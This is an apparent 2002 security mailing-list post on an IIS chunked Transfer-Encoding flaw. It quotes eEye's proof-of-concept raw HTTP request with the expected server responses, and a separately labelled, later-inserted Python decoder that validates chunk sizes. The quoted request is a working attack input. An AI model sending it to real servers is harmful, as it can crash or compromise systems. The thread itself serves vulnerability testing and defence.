I have not been able to reproduce these results. I have managed to lock up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages appear and no entries in the Application Log. I have also been able to get the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but still no popup or messages. Is there a reliable way to scan for these vulnerabilities remotely?

On Thu, 2002-04-11 at 11:25, Erik Parker wrote:
> JM> Anyone have a proof of concept for this exploit?
>
> eEye included some. Use this with "netcat" or "telnet"
>
> replace [enter] with an actual pressing of your enter key (look at the
> bottom, you can cut n paste)
>
> It should return something like this, if it worked (and generate a popup
> error to you that says "Unknown has generated errors")
>
> HTTP/1.1 100 Continue
> Server: Microsoft-IIS/5.0
> Date: Wed, 27 Mar 2002 23:37:32 GMT
>
> If it fails, it'll say something like:
>
> HTTP/1.1 500 Server Error
> Server: Microsoft-IIS/5.0
>
>
> The application log will say:
>
> Active Server Pages service has started
> Access performance data was denied to IWAM_netbiosname as attempted from c:\WINNT\SYSTEM32\Drwtsn32.exe
>
>
> **************Begin Session****************
> POST /iisstart.asp HTTP/1.1
> Accept: */*
> Host: eeye.com
> Content-Type: application/x-www-form-urlencoded
> Transfer-Encoding: chunked
>
> 10
> PADPADPADPADPADP
> 4
> DATA
> 4
> DEST
> 0
> [enter]
> [enter]
> **************End Session******************
>

-- 
MadHat at Unspecific.com
gpg --keyserver wwwkeys.us.pgp.net --recv-keys 9DDC3E98
Key fingerprint = E786 7B30 7534 DCC2 94D5 91DE E922 0B21 9DDC 3E98
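The quoted session is a plain HTTP/1.1 request whose body uses "Transfer-Encoding: chunked": each chunk is a hexadecimal size line, that many bytes, a CRLF, repeated until a zero-size chunk and an empty line. The following decoder is an added example for this thread, not eEye's proof of concept and not any IIS code. It parses exactly that request (re-typed with CRLF line endings) and shows the checks a server-side decoder must make before trusting a client-supplied chunk size: the size line must be well-formed hex, the declared size must be bounded before any copy, the data must actually be present, and the CRLF after each chunk must be there. The two size caps and the sample inputs are assumptions constructed for the example.

```python
"""Defensive decoder for an HTTP/1.1 chunked request body (added example)."""
import re

MAX_CHUNK_SIZE = 64 * 1024       # assumed per-chunk cap for the example
MAX_BODY_SIZE = 1024 * 1024      # assumed cap on the decoded body

# chunk-size line: 1..8 hex digits, optional ";name=value" chunk extensions
_CHUNK_SIZE_LINE = re.compile(rb"^([0-9A-Fa-f]{1,8})(?:;.*)?$")


class ChunkedBodyError(ValueError):
    """Malformed chunked body, or a declared size over the caps."""


def decode_chunked(raw, max_chunk=MAX_CHUNK_SIZE, max_body=MAX_BODY_SIZE):
    """Return the decoded body bytes, or raise ChunkedBodyError."""
    body = bytearray()
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            raise ChunkedBodyError("missing chunk-size line")
        m = _CHUNK_SIZE_LINE.match(raw[pos:eol])
        if m is None:
            raise ChunkedBodyError("bad chunk-size line: %r" % raw[pos:eol])
        size = int(m.group(1), 16)          # "10" on the wire means 16 bytes
        # The declared size is client-controlled: bound it before any copy.
        if size > max_chunk:
            raise ChunkedBodyError("chunk size %d over per-chunk cap" % size)
        if len(body) + size > max_body:
            raise ChunkedBodyError("decoded body over total cap")
        pos = eol + 2
        if size == 0:
            # last-chunk: optional trailer lines, then one empty line
            while True:
                eol = raw.find(b"\r\n", pos)
                if eol < 0:
                    raise ChunkedBodyError("unterminated trailer section")
                line, pos = raw[pos:eol], eol + 2
                if line == b"":
                    return bytes(body)
        chunk = raw[pos:pos + size]
        if len(chunk) != size:
            raise ChunkedBodyError("chunk shorter than declared size")
        body += chunk
        pos += size
        if raw[pos:pos + 2] != b"\r\n":
            raise ChunkedBodyError("chunk data not followed by CRLF")
        pos += 2


def parse_request(raw):
    """Split a raw request into (request line, headers dict, decoded body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ChunkedBodyError("no end of headers")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("ascii")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("ascii")
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = decode_chunked(body)
    return request_line, headers, body


# Constructed from the session quoted in the thread, with CRLF line endings;
# the [enter] presses end the "0" line and supply the final empty line.
SAMPLE_REQUEST = (
    b"POST /iisstart.asp HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Host: eeye.com\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"10\r\nPADPADPADPADPADP\r\n"
    b"4\r\nDATA\r\n"
    b"4\r\nDEST\r\n"
    b"0\r\n\r\n"
)

# Constructed: one chunk whose declared size (0xFFFFFFFF) is far larger than
# the data that follows; a decoder that trusts the size would read past it.
OVERSIZED_CHUNK = b"FFFFFFFF\r\nDATA\r\n0\r\n\r\n"


if __name__ == "__main__":
    line, hdrs, body = parse_request(SAMPLE_REQUEST)
    print(line, hdrs["transfer-encoding"], body)
    try:
        decode_chunked(OVERSIZED_CHUNK)
    except ChunkedBodyError as err:
        print("rejected:", err)
```

Run as-is, the sample decodes to the 24 bytes "PADPADPADPADPADPDATADEST" (the "10" size line is hex, so the first chunk is 16 bytes), and the oversized chunk is rejected at the size check before any data is touched. The same order of checks (validate the size, then the data, then the delimiter) is what to look for when reviewing any chunked decoder.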
This archive was generated by hypermail 2b30 : Fri Apr 12 2002 - 09:33:06 PDT